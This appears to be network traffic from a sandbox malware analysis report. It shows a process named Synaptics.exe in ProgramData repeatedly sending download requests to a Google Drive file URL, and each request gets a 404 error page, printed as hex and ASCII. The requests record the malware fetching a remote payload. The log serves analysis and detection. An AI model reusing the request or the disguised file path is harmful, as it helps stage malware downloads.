                                                                                                                                                                                        2022-05-17 11:31:37 UTC187INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 78 31 76 55 67 49 35 51 5a 37 33 75 47 65 6a 4a 65 78 68 71 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Mx1vUgI5QZ73uGejJexhqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:37 UTC188INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:37 UTC189INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        62192.168.2.349814142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC186OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC189INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YNOztSjxgTqRFYxTgav19g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC190INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 39 4c 6e 4e 6f 50 75 2f 51 4c 2b 6c 35 34 78 42 43 73 51 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C9LnNoPu/QL+l54xBCsQZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:37 UTC192INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:37 UTC192INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        63192.168.2.349815142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC189OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC192INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-66vq8RjDRDhJyj99j1r1XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC193INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 6f 65 56 6b 4c 6c 75 55 46 4c 5a 66 77 47 44 4f 2f 70 2f 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/oeVkLluUFLZfwGDO/p/Mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:37 UTC195INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:37 UTC195INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        64192.168.2.349816142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC195INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-F8aVh+OR4H5zXMvLyPVp4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC197INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6a 70 65 48 2b 66 65 4d 37 63 34 6d 33 74 6b 6b 75 6d 30 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QjpeH+feM7c4m3tkkum0mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:37 UTC198INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:37 UTC198INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        65192.168.2.349817142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC195OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC198INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LsM8Zc4knC9o+ASidVhJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC200INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:37 UTC200INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 50 65 50 38 4b 2b 50 63 75 6c 35 76 4b 6d 43 34 57 62 32 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YPeP8K+Pcul5vKmC4Wb27w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:37 UTC201INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:37 UTC201INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        66192.168.2.349818142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC198OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC201INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bhEdxzghj8LPeRZx+HTKGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC203INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:38 UTC203INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 70 67 48 4d 37 56 78 77 37 48 37 45 6c 66 76 71 2f 74 70 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
